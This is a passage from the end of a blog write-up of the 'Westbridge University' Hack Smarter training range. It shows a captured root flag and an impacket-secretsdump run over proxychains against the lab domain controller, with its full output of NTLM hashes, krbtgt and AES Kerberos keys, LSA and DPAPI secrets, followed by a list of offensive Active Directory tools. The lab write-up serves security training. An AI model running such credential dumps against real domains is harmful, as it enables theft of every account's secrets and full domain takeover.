-rw-rw-rw- 5891 Wed Jul 15 12:54:20 2026 root.txt
# get root.txt
#
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ cat root.txt

Flag07[DC_*****]

⠀⠀⠀⠀⠀⠀⠀⢀⣶⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⣦⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⣀⠀⠀⠀⠀⢀⣾⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⢿⣷⣄⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣾⣿⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⣿⣧⡀⠀⠀⣼⠃⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⣿⠻⣷⣄⡀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣧⠀⠀⠀⠀⠀⢀⣴⡶⠀⠀⠀⠀⠀
⠀⢸⣿⣧⠀⣰⡏⠀⣿⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣀⣀⣠⣤⣈⣧⠈⠻⣿⣦⣀⣀⠀⠀⠀⣸⣿⣿⣿⣆⠀⠀⠀⣴⣿⣿⠃⠀⠀⠀⠀⠀
⠀⠘⡏⢿⣧⣿⠀⢀⣿⠁⠀⢀⣾⡇⠀⠀⠀⣀⠤⠖⠂⠉⠉⠀⠀⠀⠀⠀⠸⡏⣀⣀⣭⣷⣄⠉⠉⠒⢻⣿⣿⣿⣿⡆⢀⣾⣿⣿⡏⠀⠀⠀⠀⠀⠀
⠀⣤⣇⠘⣿⠇⠀⢸⡇⠀⢠⣾⣿⣀⡤⠚⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢻⢻⣽⣿⣿⣿⣧⡀⠀⢸⣿⣿⣿⣿⣿⣿⣿⣿⣿⡇⠀⠀⠀⠀⠀⠀
⢸⣿⣿⡀⢻⡇⢠⡿⠀⣰⣿⡿⠛⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⣿⣿⣿⣿⣿⣿⣷⡀⢸⣿⣿⣿⣿⠏⠙⢿⣿⣿⣇⠀⠀⠀⠀⢀⣶
⢸⣿⣿⣧⣈⣧⡿⠁⢠⡿⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⡀⠀⠀⠀⠀⠸⣿⣿⣿⣿⣿⣿⣧⠈⣿⣿⣿⡏⠀⠀⣼⢹⣿⣿⠀⠀⠀⢀⣾⣿
⣿⡟⢿⣿⣿⣿⠁⡴⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢿⠳⡀⠀⠀⠀⠈⠻⣿⣿⣿⣿⣿⡆⢹⣿⣿⠁⠀⢀⢛⣼⣿⣿⠳⣄⢀⣾⣿⣿
⢻⡇⠀⢻⣿⣇⡞⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⣧⠘⢦⣀⡀⠀⠀⠈⠻⣿⣿⣿⣇⠀⣿⡟⠀⠀⡞⣿⣿⣿⣿⠀⠘⣿⡗⣿⣿
⠈⣧⠀⠈⣿⡟⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⢦⡀⠈⠙⡓⠶⣤⣄⡈⠻⣿⣿⣧⣸⡇⡆⠀⢳⣿⣿⣿⡇⠀⣸⣏⠁⣿⣿
⠀⠹⡆⠀⣿⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠙⢦⡀⠉⠳⢦⡈⠛⠷⣿⣿⣿⣿⣅⠁⠀⣿⣿⣿⡟⠀⢰⣿⠃⠀⣼⣿
⠀⠀⢻⣀⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠙⠲⣄⣄⣌⣲⣄⠸⣿⡿⣿⣿⣷⣴⣿⣿⠟⠀⠀⣿⡿⠀⠀⣸⡟
⠀⠀⠘⣿⡏⠀⠀⠀⢀⠀⠀⠀⠀⠀⠐⣿⣿⢿⣶⣶⣦⣄⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠻⢿⣿⣿⣷⣿⣧⠈⠻⢿⣿⣿⠋⠀⠀⢸⣿⠇⠀⣼⡿⣇
⠀⣀⡴⢋⣴⣿⣿⣿⣿⣿⡷⠿⣿⣿⣿⢣⣾⣿⣿⣿⣿⣷⣭⣙⠶⡄⠀⠀⢰⡇⠀⠀⠀⠀⠀⠙⠻⣿⣿⣿⣧⠀⠘⠛⣿⣆⠀⠀⣿⡇⠀⢀⣿⠇⢸
⠀⢻⠀⣿⣿⣿⣿⣿⣿⠟⠁⠀⠀⠈⢁⣾⣿⣿⣿⣿⣿⣿⣿⣿⣷⡹⡄⠀⠀⠳⡄⠀⠀⠀⠀⠀⠀⠈⠙⠿⣿⣇⠀⠀⠈⢻⡆⢸⠃⠀⠀⣾⠏⠀⢸
⠀⠈⡇⣿⣿⣿⣿⣿⣧⠀⠀⠀⠀⠀⠈⢻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⡹⡀⠀⠀⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⢿⣾⡄⠀⠀⢿⡟⠀⣠⣼⣿⠇⠀⢼
⠀⠸⣅⢷⣿⣿⣿⣿⣿⣧⡀⠀⠀⠀⠀⠀⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠇⡇⠀⠀⢧⡀⠀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠹⣿⣦⢠⣿⣿⣿⡿⣿⣿⠀⠀⡟
⠀⣀⡿⠈⢿⣿⣿⡇⢻⣿⡗⠀⠀⠀⠀⢰⣿⣿⣿⣿⣿⣿⣿⣿⡿⠃⣸⠁⠀⠀⠀⠀⠉⠁⠀⠀⠀⠀⠀⣠⣴⣿⣿⣿⣿⣿⣿⠿⠋⣴⣿⣿⠀⢀⡟
⠀⡿⠁⠀⠼⠛⢹⣯⣸⣿⣷⡄⠀⠀⠀⠀⠈⠻⢿⣿⣿⣿⡿⠛⠁⡰⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣰⠞⠉⢿⡿⠿⠟⣻⡟⠁⢠⡾⠛⢩⣿⣰⡿⠀
⠸⡇⠀⠀⠀⠀⢸⠇⠿⠋⣿⡿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠜⠁⠀⠀⣠⡴⢻⣿⣿⣶⣶⣶⣾⡿⠀⡖⢸⡇⠀⢠⡟⣠⡾⣋⣴⣴⠟⣽⣿⠃⠀
⠀⢷⠀⢀⡾⣤⣼⣶⡖⠶⣿⠃⠀⠀⠀⠀⠀⢲⣷⣶⡶⠶⠆⣀⣀⣠⣴⠟⡟⠀⠀⠻⣿⣿⣿⣿⣿⠁⢨⠃⣸⣿⣦⣿⣟⣩⣾⡿⠋⣡⣾⣿⠃⠀⠀
⠀⠀⠉⠉⠀⢰⠏⠈⠻⠀⠀⠀⠀⠀⠀⠀⠀⠀⣻⣏⣴⣾⣿⡟⠁⠀⠀⣸⡇⠀⠀⠀⢿⠻⠿⢫⠏⠀⠀⠀⣿⣿⣿⣿⣿⠿⠁⣶⣴⣿⣿⠇⠀⠀⠀
⠀⠀⠀⠀⢀⠟⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⡿⣿⠏⣿⡇⠀⢀⣾⣿⠧⠀⠀⠀⢸⡄⣰⠟⠀⠀⠀⢠⣿⣿⣿⣯⣁⣠⣾⣿⣿⠟⠋⠀⠀⠀⠀
⠀⠀⠀⠀⣼⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠉⠘⠋⢰⣿⣿⣶⡾⣿⣿⠇⠀⣠⠞⢉⠜⠁⡴⠀⢀⣴⡟⠉⠀⠉⠛⠿⠿⠟⠋⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⣹⣶⡦⣴⢲⣴⢦⡤⣤⣤⣄⣤⣤⣤⣤⣤⣴⡿⠋⠙⢿⣯⣿⣿⠀⡰⠃⠀⠋⠀⡼⠁⠀⡞⣸⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⡏⣿⢰⡇⢰⠇⢸⡇⣸⣨⣇⣸⣏⣸⢇⣾⣿⣀⣠⠤⠤⠵⣫⠏⠀⠀⠀⠀⠀⠀⠀⠀⡼⠀⢹⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠙⣟⢿⢿⣿⣷⣿⣹⣇⣿⣸⣧⠥⠿⠴⠜⠋⠁⠀⠀⡴⠞⠁⠀⠀⠀⠀⠀⠀⠀⢀⡴⠁⢀⣼⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⣿⠛⠉⠉⠙⠉⠁⠈⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠉⢀⣠⣾⠟⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⢸⣠⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣠⣤⣤⣴⣶⠾⠛⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⣸⠟⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣴⣶⣾⠿⠛⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⢸⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⠀⢀⣠⣾⡾⠟⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⣿⠀⢀⣀⡀⣀⡀⠀⠀⠀⠀⠀⠀⣀⣠⣴⣶⠶⠿⠛⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠘⢷⣂⣀⣀⣀⣍⣳⣶⣾⣿⠿⠟⠛⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠙⠛⠻⠿⠿⠛⠋⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀



┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$
1
Flag07[DC_*****]

A full secretsdump over DRSUAPI then pulls the research krbtgt and every hash - total forest compromise:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$ KRB5CCNAME=./Administrator@cifs_DC02.westbridge-research.hsm@WESTBRIDGE-RESEARCH.HSM.ccache proxychains4 -q impacket-secretsdump -k -no-pass DC02.westbridge-research.hsm -dc-ip 10.0.20.5
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xc43b2700f4b5133cc65ee9a1ac2e4091
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0d04aac8ba07923f94374d85ed9f7ac7:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
WBRESEARCH\DC02$:plain_password_hex:0aaa8e08d72e1fb5319a1c2ebcfd1e0cdb9048753c92739102af41c91176687e51043bb56273a86747e8bc5be7dc4cb03a905d647adc22a3784c947018e4d5881391336c38fa0195a009bc81fdcf825c49e6bbv91a121af199fe02619c225ad380b396dbf1b80ac07c6899add64c55ab283d498cca2906f5136ee67ef414c4df1504f72fbfa5fd4a95f19bb4a70f6b2016955af883bba6e489ee40e2f6aa229c10b44d5b9feaeedabfa436c32d5769953bdff29ab05c49032396a4dbcea913f30d6e8ad9758739cd0090951bb43b44cd68aae3f3e0ff628f44cb663b8cd3b3543590e0d2dc1c750a447182bb8ddab3ea
WBRESEARCH\DC02$:aad3b435b51404eeaad3b435b51404ee:198488c034d5d930d19aacb6c0aa860d:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0x3557520ffd67281d16e0fece5b3e0e88fd3105f6
dpapi_userkey:0x3c2ba5aa98323de08a367de8906818aff6f70488
[*] NL$KM
0000 D6 F9 1E BE 20 95 21 6A 88 22 1F 5C 92 CE 2C 8A .... .!j.".\..,.
0010 BB CF 2C 38 59 53 A4 3A EF A0 03 DA EA A5 A8 CF ..,8YS.:........
0020 0E 6F 91 92 02 3E 5B 45 40 E2 C7 A8 D5 DA 8B 11 .o...>[E@.......
0030 6D 77 6B 5F 3F 78 48 12 0F BF A8 CE 06 C2 C6 7C mwk_?xH........|
NL$KM:d6f91ebe2095216a88221f5c92ce2c8abbcf2c385953a43aefa003daeaa5a8cf0e6f9192023e5b4540e2c7a8d5da8b116d776b5f3f7848120fbfa8ce06c2c67c
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:401138f45c01009e2da7b25eae9a6446:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:cd83c3f7dfadf27fa96d4f6a51f9144e:::
westbridge-research.hsm\r.parker:1106:aad3b435b51404eeaad3b435b51404ee:2ae3bb2799637b6a70abef0a349ebaad:::
westbridge-research.hsm\m.carter:1107:aad3b435b51404eeaad3b435b51404ee:2ae3bb2799637b6a70abef0a349ebaad:::
westbridge-research.hsm\t.walker:1108:aad3b435b51404eeaad3b435b51404ee:2ae3bb2799637b6a70abef0a349ebaad:::
westbridge-research.hsm\j.bones:1110:aad3b435b51404eeaad3b435b51404ee:c409deabbc872162494f8ba329f3eb30:::
westbridge-research.hsm\a.howard:1113:aad3b435b51404eeaad3b435b51404ee:615e8c800974e89c6c3ca1d162f0d80b:::
DC02$:1000:aad3b435b51404eeaad3b435b51404ee:198488c034d5d930d19aacb6c0aa860d:::
WEB$:1101:aad3b435b51404eeaad3b435b51404ee:34f86e11de7057d31e5d65754f1912ab:::
WESTBRIDGE$:1104:aad3b435b51404eeaad3b435b51404ee:0fbc528d9723ad9874bb8ff57f35ac9b:::
[*] Kerberos keys grabbed
Administrator:0x14:cde2c6838fd233f5fd6fedf004715841a4331ca41ec41f81287118fe8971a2a9
Administrator:0x13:f36a3c577fdb8e724228b71e63c8c446
Administrator:aes256-cts-hmac-sha1-96:06a405bc0b070a460a77081b4a6ff16e8c1c79492d9fd2cab079cb5dab322f36
Administrator:aes128-cts-hmac-sha1-96:51f94c1e6560a9401d58dfed1a59b063
Administrator:0x17:401138f45c01009e2da7b25eae9a6446
krbtgt:aes256-cts-hmac-sha1-96:cc9da2a4fbea735e4da2c0042b9cfec9a41b9ae80934f300638cd631d06174f3
krbtgt:aes128-cts-hmac-sha1-96:72c632894b4b1d5d21a9b9c2bfcf1034
krbtgt:0x17:cd83c3f7dfadf27fa96d4f6a51f9144e
westbridge-research.hsm\r.parker:0x14:d46e93f411acd3036d3b1666a257f4a831ab2bbd5be7f80149dec69a388f2f8c
westbridge-research.hsm\r.parker:0x13:f7159dee0a0114bd9c9f622a5bcdb91b
westbridge-research.hsm\r.parker:aes256-cts-hmac-sha1-96:3a4fee13084536a18ff589df0dc44740ab768aacf2d35dc879a0a5ce9fe0017a
westbridge-research.hsm\r.parker:aes128-cts-hmac-sha1-96:63e7cff3f144298e6438deb1d302be6a
westbridge-research.hsm\r.parker:0x17:2ae3bb2799637b6a70abef0a349ebaad
westbridge-research.hsm\m.carter:0x14:dd6f25a12ad05bd2bb8a2350aa8350ab84d4af1d7f634288a50b61e788eb90ff
westbridge-research.hsm\m.carter:0x13:ba893caff61e3b51bbddba7c5b5263c6
westbridge-research.hsm\m.carter:aes256-cts-hmac-sha1-96:6a282d07487324342d13089db6e384ffbc99551be071d87765ac33e546e27dd6
westbridge-research.hsm\m.carter:aes128-cts-hmac-sha1-96:4caafb308647eedc7a4418d235d07950
westbridge-research.hsm\m.carter:0x17:2ae3bb2799637b6a70abef0a349ebaad
westbridge-research.hsm\t.walker:0x14:7f1acc0ab0becb181c17c681590d8c0a7b7e9881aca7fc6441e22c8139d46afc
westbridge-research.hsm\t.walker:0x13:49dedaa1d97cb23b87136f48126635ba
westbridge-research.hsm\t.walker:aes256-cts-hmac-sha1-96:815c469210ff1d5deab054fcd4dc06ac21c54b03164274b8e8201188286377c5
westbridge-research.hsm\t.walker:aes128-cts-hmac-sha1-96:ffff7fac0d21c7e20218eb9d304ad21d
westbridge-research.hsm\t.walker:0x17:2ae3bb2799637b6a70abef0a349ebaad
westbridge-research.hsm\j.bones:0x14:3d228d4cbe3f0b677f929d83ddc28e22f927119d957bd644c87531bb60de4473
westbridge-research.hsm\j.bones:0x13:098db7ba8014b7342331b07fa671d143
westbridge-research.hsm\j.bones:aes256-cts-hmac-sha1-96:6aa7a734cae0f87adf7afd5571d768727eb6b0063a56fe2de7fa12a7cb8bc698
westbridge-research.hsm\j.bones:aes128-cts-hmac-sha1-96:c7fd731645157784d130c9ff7ac82b06
westbridge-research.hsm\j.bones:0x17:c409deabbc872162494f8ba329f3eb30
westbridge-research.hsm\a.howard:0x14:764449547a61182d9bb2362cce515ea6a1090f358dd735361995c264617e5ed7
westbridge-research.hsm\a.howard:0x13:34439e411237802f776460060f4baebe
westbridge-research.hsm\a.howard:aes256-cts-hmac-sha1-96:cf53b16cca1364d36ae3830db39b29b3bb4ce46ba8fadcd51bd7b56026389de2
westbridge-research.hsm\a.howard:aes128-cts-hmac-sha1-96:7c83baf862cfe5a135808cef1db9b35f
westbridge-research.hsm\a.howard:0x17:615e8c800974e89c6c3ca1d162f0d80b
DC02$:aes256-cts-hmac-sha1-96:43568dc9428c7cd0e760f7dad7d331c8a327fe7219aa57ecd7d14c53e013a836
DC02$:aes128-cts-hmac-sha1-96:6f23d798c541875754ce2d1c3da5145f
DC02$:0x17:198488c034d5d930d19aacb6c0aa860d
WEB$:0x14:15f36bcfc12fbb9a700eb6a5331bf9980d049a76d61d95ff5b044202327dcde5
WEB$:0x13:9d0a62c059d74b223257a1685c27b0d7
WEB$:aes256-cts-hmac-sha1-96:1bff63e581469282b52b61d48d0121de60831370117f5f921e6bee7d7f68d6e8
WEB$:aes128-cts-hmac-sha1-96:3bd7f21178b786e452af5560b9dc76ff
WEB$:0x17:34f86e11de7057d31e5d65754f1912ab
WESTBRIDGE$:aes256-cts-hmac-sha1-96:26d1b12742077f1e44f677364ce7fbe5bc0b8e4874836a3d4bd058a1d0382478
WESTBRIDGE$:aes128-cts-hmac-sha1-96:bac023a797900591c638875283d01a29
[*] Cleaning up...
[*] Stopping service RemoteRegistry
[-] SCMR SessionError: code: 0x41b - ERROR_DEPENDENT_SERVICES_RUNNING - A stop control has been sent to a service that other running services are dependent on.
[*] Cleaning up...
[*] Stopping service RemoteRegistry
┌──(kali㉿kali)-[~/Desktop/HackSmarter/Range: Westbridge University]
└─$

References

Tools

  • Impacket - GetNPUsers, GetUserSPNs, lookupsid, ticketer, getST, getTGT, mssqlclient, smbclient, secretsdump, changepasswd, rbcd
  • NetExec (nxc) - SMB/LDAP/RDP/SSH enumeration, Kerberoasting, password spraying
  • BloodHound CE · SharpHound · bloodhound.py - Active Directory attack-path mapping
  • bloodyAD - LDAP object/ACL manipulation, Shadow Credentials, and DNS record manipulation
  • Certipy - Active Directory Certificate Services enumeration and ESC abuse
  • Responder - LLMNR/NBT-NS poisoning and NTLM credential capture
  • Mimikatz - SAM/LSA secrets and DPAPI
  • GodPotato · SigmaPotato - SeImpersonatePrivilege to SYSTEM
  • Hashcat · John the Ripper - password cracking
  • Chisel - TCP/SOCKS tunneling
  • kpcli - KeePass CLI

Techniques & Further Reading

Lab

The Hack Smarter - Westbridge University range lab can be found here: Hack Smarter - Westbridge University.


Thanks for reading! If you spot any mistakes or have questions or feedback about anything in this write-up, feel free to reach out - I’m always happy to discuss. You can find me on GitHub and LinkedIn.

  • Title: Westbridge University - Hack Smarter Range [Hard]
  • Author: Sebin Thomas
  • Created at : 2026-08-26 20:30:00
  • Updated at : 2026-08-28 21:47:00
  • Link: https://blog.sebinthomas.in/2026/08/26/westbridge-university-hacksmarter/
  • License: All Rights Reserved © Sebin Thomas